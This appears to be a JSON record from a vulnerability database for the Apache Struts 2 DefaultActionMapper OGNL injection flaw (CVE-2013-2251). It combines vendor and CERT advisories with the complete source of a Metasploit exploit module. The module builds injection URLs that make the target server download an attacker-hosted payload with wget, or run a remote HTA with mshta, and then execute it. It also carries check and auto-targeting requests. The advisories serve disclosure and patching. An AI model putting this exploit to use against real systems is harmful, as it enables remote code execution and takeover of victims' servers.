"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61678"}], "saint": [{"lastseen": "2018-08-31T00:08:13", "bulletinFamily": "exploit", "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. 
It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-08-01T00:00:00", "published": "2013-08-01T00:00:00", "id": "SAINT:8B8924409E9AFE277FF0998CBA641AF8", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. 
\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-08-01T00:00:00", "published": "2013-08-01T00:00:00", "id": "SAINT:2FE5CCE51B64707F8D205A80240A6467", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "type": "saint", "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:07", "bulletinFamily": "exploit", "description": "Added: 08/01/2013 \nCVE: [CVE-2013-2251](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nBID: [61189](<http://www.securityfocus.com/bid/61189>) \nOSVDB: [95405](<http://www.osvdb.org/95405>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. 
\n\n### Problem\n\nThe `**DefaultActionMapper**` in Struts 2 versions prior to 2.3.15.1 does not properly handle parameters with a crafted `**redirect:**` prefix. This could allow remote attackers to execute arbitrary OGNL code. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.3.15.1 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-016.html> \n\n\n### Limitations\n\nThis exploit was tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-08-01T00:00:00", "published": "2013-08-01T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_defaultactionmapper_redirect_prefix", "id": "SAINT:279F8312DEF0028C5D034325A810E73D", "type": "saint", "title": "Apache Struts DefaultActionMapper redirect Prefix Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:50", "bulletinFamily": "unix", "description": "\nA Bugzilla Security Advisory reports:\n\nThe login form had no CSRF protection, meaning that\n\t an attacker could force the victim to log in using the\n\t attacker's credentials. 
If the victim then reports a new\n\t security sensitive bug, the attacker would get immediate\n\t access to this bug.\n\n\t Due to changes involved in the Bugzilla API, this fix is\n\t not backported to the 4.0 and 4.2 branches, meaning that\n\t Bugzilla 4.0.12 and older, and 4.2.8 and older, will\n\t remain vulnerable to this issue.\n\n", "modified": "2014-04-18T00:00:00", "published": "2014-04-17T00:00:00", "id": "608ED765-C700-11E3-848C-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/608ed765-c700-11e3-848c-20cf30e32f6d.html", "title": "bugzilla -- Cross-Site Request Forgery", "type": "freebsd", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}], "cisco": [{"lastseen": "2017-09-26T15:33:38", "bulletinFamily": "software", "description": "A vulnerability in the DefaultActionMapper component could allow an unauthenticated, remote attacker to execute arbitrary commands on the targeted system.\n\nThe vulnerability is due to insufficient sanitization of user-supplied input. An attacker could exploit this vulnerability by sending crafted requests consisting of Object-Graph Navigation Language (OGNL) expressions. An exploit could allow the attacker to execute arbitrary code on the targeted system.\n\nMultiple Cisco products include an implementation of the Apache Struts 2 component that is affected by a remote command execution vulnerability. \n\nThe vulnerability is due to insufficient sanitization of user-supplied\ninput. An attacker could exploit this vulnerability by sending crafted requests\nconsisting of Object-Graph Navigation Language (OGNL) expressions to an affected system. An\nexploit could allow the attacker to execute arbitrary code on the targeted system. \n\nCisco has released software updates that address this vulnerability for all the affected products except Cisco Business Edition 3000. 
Cisco Business Edition 3000 customers should contact their Cisco representative for available options.\n\nWorkarounds that mitigate this vulnerability are not available.\nThis advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2\"]", "modified": "2015-10-12T12:30:06", "published": "2013-10-23T16:00:00", "id": "CISCO-SA-20131023-STRUTS2", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2", "type": "cisco", "title": "Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-01-28T04:06:43", "bulletinFamily": "exploit", "description": "The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or \"redirectAction:\" is not properly sanitized. 
Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.", "modified": "2017-07-24T13:26:21", "published": "2013-07-24T13:52:02", "id": "MSF:EXPLOIT/MULTI/HTTP/STRUTS_DEFAULT_ACTION_MAPPER", "href": "", "type": "metasploit", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution',\n 'Description' => %q{\n The Struts 2 DefaultActionMapper supports a method for short-circuit navigation\n state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by\n a desired navigational target expression. This mechanism was intended to help with\n attaching navigational information to buttons within forms.\n\n In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or\n \"redirectAction:\" is not properly sanitized. 
Since said information will be\n evaluated as OGNL expression against the value stack, this introduces the\n possibility to inject server side code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Takeshi Terada', # Vulnerability discovery\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit modules\n ],\n 'References' =>\n [\n [ 'CVE', '2013-2251' ],\n [ 'OSVDB', '95405' ],\n [ 'BID', '61189' ],\n [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]\n ],\n 'Platform' => %w{ linux win },\n 'Targets' =>\n [\n ['Automatic', {}],\n ['Windows',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win'\n }\n ],\n ['Linux',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux'\n }\n ]\n ],\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 10\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DisclosureDate' => 'Jul 2 2013',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']),\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]),\n OptInt.new('PAYLOAD_REQUEST_DELAY', [true, 'Time to wait for the payload request', 5]),\n # It isn't OptPath becuase it's a *remote* path\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ])\n ])\n end\n\n def on_new_session(session)\n if session.type == \"meterpreter\"\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\n end\n\n @dropped_files.delete_if do |file|\n false unless file =~ /\\.exe/\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\n if session.type == \"meterpreter\"\n begin\n wintemp = session.sys.config.getenv('TEMP')\n win_file = \"#{wintemp}\\\\#{win_file}\"\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\n session.fs.file.rm(win_file)\n print_good(\"Deleted #{file}\")\n true\n rescue ::Rex::Post::Meterpreter::RequestError\n print_error(\"Failed to 
delete #{win_file}\")\n false\n end\n end\n end\n\n super\n end\n\n def start_http_service\n # do not use SSL for this part\n # XXX: See https://github.com/rapid7/metasploit-framework/issues/3853\n # It must be possible to do this without directly editing the\n # datastore.\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\n srv_host = Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n service_url = srv_host + ':' + datastore['SRVPORT'].to_s\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\n start_service({\n 'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => '/'\n }\n })\n\n # Restore SSL preference\n # XXX: See https://github.com/rapid7/metasploit-framework/issues/3853\n # It must be possible to do this without directly editing the\n # datastore.\n datastore['SSL'] = true if ssl_restore\n\n return service_url\n end\n\n def check\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET'\n })\n\n if res.nil? or res.code != 200\n vprint_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\")\n return Exploit::CheckCode::Unknown\n end\n\n proof = rand_text_alpha(6 + rand(4))\n\n res = send_request_cgi({\n 'uri' => \"#{uri}?redirect:%24{new%20java.lang.String('#{proof}')}\",\n 'method' => 'GET'\n })\n\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ and res.headers['Location'] !~ /String/\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def auto_target\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET'\n })\n\n if res.nil? 
or res.code != 200\n fail_with(Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\")\n end\n\n proof = rand_text_alpha(6 + rand(4))\n\n res = send_request_cgi({\n 'uri' => \"#{uri}?redirect:%24{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\",\n 'method' => 'GET'\n })\n\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\n if res.headers['Location'] =~ /:\\\\/\n return targets[1] # Windows\n else\n return targets[2] # Linux\n end\n end\n\n fail_with(Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\")\n\n end\n\n def exploit_linux\n\n downfile = rand_text_alpha(8+rand(8))\n @pl = @exe\n @pl_sent = false\n\n #\n # start HTTP service if necessary\n #\n service_url = start_http_service\n\n #\n # download payload\n #\n fname = datastore['WritableDir']\n fname = \"#{fname}/\" unless fname =~ %r'/$'\n fname << downfile\n uri = normalize_uri(target_uri.path)\n uri << \"?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\n\n print_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil? or res.code != 302\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\n end\n\n #\n # wait for payload download\n #\n wait_payload\n\n register_file_for_cleanup(fname)\n\n #\n # chmod\n #\n uri = normalize_uri(target_uri.path)\n uri << \"?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\n\n print_status(\"#{rhost}:#{rport} - Make payload executable...\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil? 
or res.code != 302\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\n end\n\n #\n # execute\n #\n uri = normalize_uri(target_uri.path)\n uri << \"?redirect:%24{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\"\n\n print_status(\"#{rhost}:#{rport} - Execute payload...\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil? or res.code != 302\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\n end\n\n end\n\n def exploit_windows\n @var_exename = rand_text_alpha(4 + rand(4)) + '.exe'\n @pl = build_hta\n @pl_sent = false\n\n #\n # start HTTP service if necessary\n #\n service_url = start_http_service\n\n #\n # execute hta\n #\n uri = normalize_uri(target_uri.path)\n uri << \"?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\"\n\n print_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res.nil? 
or res.code != 302\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\n end\n\n #\n # wait for payload download\n #\n wait_payload\n\n register_file_for_cleanup(@var_exename)\n end\n\n def exploit\n if target.name =~ /Automatic/\n print_status(\"#{rhost}:#{rport} - Target autodetection...\")\n my_target = auto_target\n print_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\")\n else\n my_target = target\n end\n\n p = exploit_regenerate_payload(my_target.platform, my_target.arch)\n @exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch})\n\n if my_target.name =~ /Linux/\n if datastore['PAYLOAD'] =~ /windows/\n fail_with(Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\")\n end\n exploit_linux\n elsif my_target.name =~ /Windows/\n if datastore['PAYLOAD'] =~ /linux/\n fail_with(Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\")\n end\n exploit_windows\n end\n end\n\n # Handle incoming requests from the server\n def on_request_uri(cli, request)\n vprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\")\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @pl_sent = true\n send_response(cli, @pl)\n end\n\n def autofilter\n true\n end\n\n # wait for the data to be sent\n def wait_payload\n print_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\")\n\n waited = 0\n while (not @pl_sent)\n select(nil, nil, nil, 1)\n waited += 1\n if (waited > datastore['HTTP_DELAY'])\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\")\n end\n end\n\n sleep(datastore['PAYLOAD_REQUEST_DELAY'])\n end\n\n def build_hta\n 
var_shellobj\t\t= rand_text_alpha(rand(5)+5);\n var_fsobj\t\t = rand_text_alpha(rand(5)+5);\n var_fsobj_file\t\t= rand_text_alpha(rand(5)+5);\n var_vbsname\t\t = rand_text_alpha(rand(5)+5);\n var_writedir\t\t= rand_text_alpha(rand(5)+5);\n\n var_origLoc\t\t = rand_text_alpha(rand(5)+5);\n var_byteArray\t\t= rand_text_alpha(rand(5)+5);\n var_writestream\t\t= rand_text_alpha(rand(5)+5);\n var_strmConv\t\t= rand_text_alpha(rand(5)+5);\n\n # Doing in this way to bypass the ADODB.Stream restrictions on JS,\n # even when executing it as an \"HTA\" application\n # The encoding code has been stolen from ie_unsafe_scripting.rb\n print_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\");\n\n # Build the content that will end up in the .vbs file\n vbs_content\t= Rex::Text.to_hex(%Q|\nDim #{var_origLoc}, s, #{var_byteArray}\n#{var_origLoc} = SetLocale(1033)\n|)\n # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)\n # for conversion with ADODB.Stream\n vbs_ary = []\n # The output of this loop needs to be as small as possible since it\n # gets repeated for every byte of the executable, ballooning it by a\n # factor of about 80k (the current size of the exe template). 
In its\n # current form, it's down to about 4MB on the wire\n @exe.each_byte do |b|\n vbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\")\n end\n vbs_content << vbs_ary.join(\"\")\n\n # Continue with the rest of the vbs file;\n # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent\n # Then use ADODB.Stream again to write the binary to file.\n #print_status(\"Finishing vbs...\");\n vbs_content << Rex::Text.to_hex(%Q|\nDim #{var_strmConv}, #{var_writedir}, #{var_writestream}\n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\"\n\nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\")\n\n#{var_strmConv}.Type = 2\n#{var_strmConv}.Charset = \"x-ansi\"\n#{var_strmConv}.Open\n#{var_strmConv}.WriteText s, 0\n#{var_strmConv}.Position = 0\n#{var_strmConv}.Type = 1\n#{var_strmConv}.SaveToFile #{var_writedir}, 2\n\nSetLocale(#{var_origLoc})|)\n\n hta = <<-EOS\n <script>\n var #{var_shellobj} = new ActiveXObject(\"WScript.Shell\");\n var #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\");\n var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\");\n var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true);\n\n #{var_fsobj_file}.Write(unescape(\"#{vbs_content}\"));\n #{var_fsobj_file}.Close();\n\n #{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true);\n #{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false);\n #{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\");\n window.close();\n </script>\n EOS\n\n return hta\n end\n\n\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_default_action_mapper.rb"}], "d2": [{"lastseen": 
"2016-09-25T14:10:43", "bulletinFamily": "exploit", "description": "**Name**| d2sec_struts4 \n---|--- \n**CVE**| CVE-2013-2251 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts4 \n**Notes**| \n", "modified": "2013-07-19T23:37:30", "published": "2013-07-19T23:37:30", "id": "D2SEC_STRUTS4", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts4", "title": "DSquare Exploit Pack: D2SEC_STRUTS4", "type": "d2", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "jvn": [{"lastseen": "2018-08-31T00:36:20", "bulletinFamily": "info", "description": "\n ## Description\n\nApache Struts provided by the Apache Software Foundation is a software framework for creating Java web applications. Apache Struts contains a remote command execution vulnerability. \n \nThis issue is the same issue that the developer published as [S2-016](<http://struts.apache.org/release/2.3.x/docs/s2-016.html>) on July 16, 2013 \n \nNote that attacks leveraging this vulnerability have been confirmed. \n\n\n ## Impact\n\nAn arbitrary command may be executed on the server where Apache Struts resides.\n\n ## Solution\n\n**Apply an Update** \nUpdate to the latest version according to the information provided by the developer. 
\n\n\n ## Products Affected\n\n * Apache Struts 2.0.0 through 2.3.15 \n\n", "modified": "2013-09-06T00:00:00", "published": "2013-09-06T00:00:00", "id": "JVN:33504150", "href": "http://jvn.jp/en/jp/JVN33504150/index.html", "title": "JVN#33504150: Apache Struts vulnerable to remote command execution", "type": "jvn", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "dsquare": [{"lastseen": "2017-09-26T15:33:26", "bulletinFamily": "exploit", "description": "Apache-Struts2 RCE\n\nVulnerability Type: Remote Command Execution", "modified": "2013-10-20T00:00:00", "published": "2013-10-20T00:00:00", "id": "E-341", "href": "", "type": "dsquare", "title": "Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}